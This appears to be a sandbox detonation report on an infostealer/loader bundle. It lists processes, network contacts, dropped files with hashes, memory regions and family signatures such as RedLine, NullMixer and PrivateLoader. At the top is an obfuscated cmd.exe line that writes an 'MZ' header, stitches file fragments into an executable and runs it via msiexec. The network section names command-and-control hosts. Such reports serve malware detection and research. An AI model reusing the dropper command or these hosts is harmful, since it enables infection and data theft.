"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 127.0.0.1:53164 tcp
N/A 127.0.0.1:53166 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 bc10ee7cbbf3ea8b505c94bd655f5e50
SHA1 4667e7d52e54ba83ee7c264c14171a4db0d1c444
SHA256 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111
SHA512 a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/4908-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4908-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4908-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4908-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4908-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1784-78-0x0000000004AD0000-0x0000000004B06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe

MD5 508251b34a5ea5271e6c8d365b3623d2
SHA1 a6f057ba3154fca2a2000cbb7ee9c171c682a8ac
SHA256 a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f
SHA512 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170

memory/3816-93-0x0000000006160000-0x00000000061C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/3816-91-0x0000000005980000-0x00000000059A2000-memory.dmp

memory/3816-113-0x0000000006240000-0x0000000006594000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhtdin5l.1lz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2508-107-0x00000000001C0000-0x00000000001D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe

MD5 c950dfa870dc50ce6e1e2fcaeb362de4
SHA1 fc1fb7285afa8d17010134680244a19f9da847a1
SHA256 b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec
SHA512 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/4364-97-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3816-103-0x00000000061D0000-0x0000000006236000-memory.dmp

memory/1892-118-0x0000000000070000-0x0000000000078000-memory.dmp

memory/4060-121-0x00000000051C0000-0x0000000005236000-memory.dmp

memory/5068-126-0x0000000000BA0000-0x0000000000C10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4060-127-0x0000000005160000-0x000000000517E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JIEQ4.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4060-147-0x00000000058F0000-0x0000000005E94000-memory.dmp

memory/2508-125-0x00000000021C0000-0x00000000021C6000-memory.dmp

memory/2892-152-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4060-119-0x0000000000950000-0x00000000009C0000-memory.dmp

memory/3816-79-0x0000000005A30000-0x0000000006058000-memory.dmp

memory/3816-158-0x0000000006BD0000-0x0000000006C1C000-memory.dmp

memory/3816-156-0x0000000006850000-0x000000000686E000-memory.dmp

memory/2556-155-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-T84SO.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4364-161-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4908-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4908-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4908-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4908-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4908-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4908-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4908-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4908-181-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3712-171-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/4908-176-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4908-172-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4908-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4908-179-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4908-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4908-67-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4908-66-0x0000000064941000-0x000000006494F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3816-202-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

memory/3816-192-0x000000006F400000-0x000000006F44C000-memory.dmp

memory/3816-190-0x0000000006E00000-0x0000000006E32000-memory.dmp

memory/3816-215-0x00000000078E0000-0x0000000007983000-memory.dmp

memory/1360-216-0x0000000005910000-0x0000000005A1A000-memory.dmp

memory/1784-205-0x000000006F400000-0x000000006F44C000-memory.dmp

memory/1360-218-0x0000000005880000-0x00000000058BC000-memory.dmp

memory/1360-204-0x00000000057E0000-0x00000000057F2000-memory.dmp

memory/3816-220-0x00000000078B0000-0x00000000078CA000-memory.dmp

memory/3816-219-0x0000000008210000-0x000000000888A000-memory.dmp

memory/1360-203-0x0000000005D90000-0x00000000063A8000-memory.dmp

memory/1360-187-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3816-221-0x0000000007BF0000-0x0000000007BFA000-memory.dmp

memory/3816-222-0x0000000007DE0000-0x0000000007E76000-memory.dmp

memory/1784-223-0x0000000007590000-0x00000000075A1000-memory.dmp

memory/3816-236-0x0000000007DA0000-0x0000000007DAE000-memory.dmp

memory/3816-237-0x0000000007DB0000-0x0000000007DC4000-memory.dmp

memory/3816-239-0x0000000007EA0000-0x0000000007EBA000-memory.dmp

memory/1784-241-0x00000000076B0000-0x00000000076B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM

MD5 b3eb9fd17e8ad098cabb8c902e9e229b
SHA1 496db608d89ede6d7e52cc12c87fd51985d77dd3
SHA256 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7
SHA512 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9

C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\nytFSko.4

MD5 f07fb7ba321155969395fd0bb1b66ecd
SHA1 c33f97f3bcd9152263cd3a267f7718bfe74871d4
SHA256 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee
SHA512 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 063b7b7f9c0886b614c653a6b7662a42
SHA1 71cec24bca03a1c28886bf664897acbecb485989
SHA256 b26ffcf41deb034f51beab3f8093fa89b53007f2bdff9d42a7dd53dce88d1078
SHA512 335debd30473e9f1497def7dcfa9f6c4f8ea156d1095c93427f22f937af7e4fc8bee9e75fc524201db56089eaa6366a09c64591c975636cb95336102cf2172ab

memory/4788-254-0x0000000003120000-0x000000000327D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n

MD5 102c7b74c9389ba3f6b3edc9d78354a5
SHA1 1f87d39721fc1248b480f3d34f53fa06881a9e60
SHA256 a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e
SHA512 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d

C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1

MD5 3d4be60221c31167e0880e394bfc4da9
SHA1 406ce7505abb85bfe841b043a3c0c9fc4accf6c5
SHA256 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db
SHA512 b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806

C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT

MD5 6dd35c1b829aa136dfa8d19a3d925b02
SHA1 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c
SHA256 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298
SHA512 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d

C:\Users\Admin\AppData\Local\Temp\SVnzW.C2

MD5 1046521a4754730fa8d91ffe7bb86dd7
SHA1 c588fef06fa101c894d165cf58b0d930b84f32bb
SHA256 de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5
SHA512 ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8

C:\Users\Admin\AppData\Local\Temp\OJM3YR.x

MD5 560cd503ea8d56af71af388068c37a0a
SHA1 e33edf708a7dde97afca2f5dc04b3de35a55c5ad
SHA256 f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4
SHA512 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996

memory/4788-259-0x0000000003630000-0x00000000036D7000-memory.dmp

memory/4788-260-0x00000000036E0000-0x0000000003774000-memory.dmp

memory/4788-263-0x00000000036E0000-0x0000000003774000-memory.dmp

memory/4788-261-0x00000000036E0000-0x0000000003774000-memory.dmp

memory/2892-265-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1036-266-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/864-270-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4788-271-0x0000000003120000-0x000000000327D000-memory.dmp

memory/4788-280-0x00000000036E0000-0x0000000003774000-memory.dmp

memory/4788-282-0x0000000005740000-0x00000000057CD000-memory.dmp

memory/4788-281-0x0000000003780000-0x000000000573B000-memory.dmp

memory/4788-286-0x00000000057E0000-0x0000000005869000-memory.dmp

memory/4788-283-0x00000000057E0000-0x0000000005869000-memory.dmp

memory/4788-287-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

memory/4788-288-0x0000000000EB0000-0x0000000000EB4000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240708-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
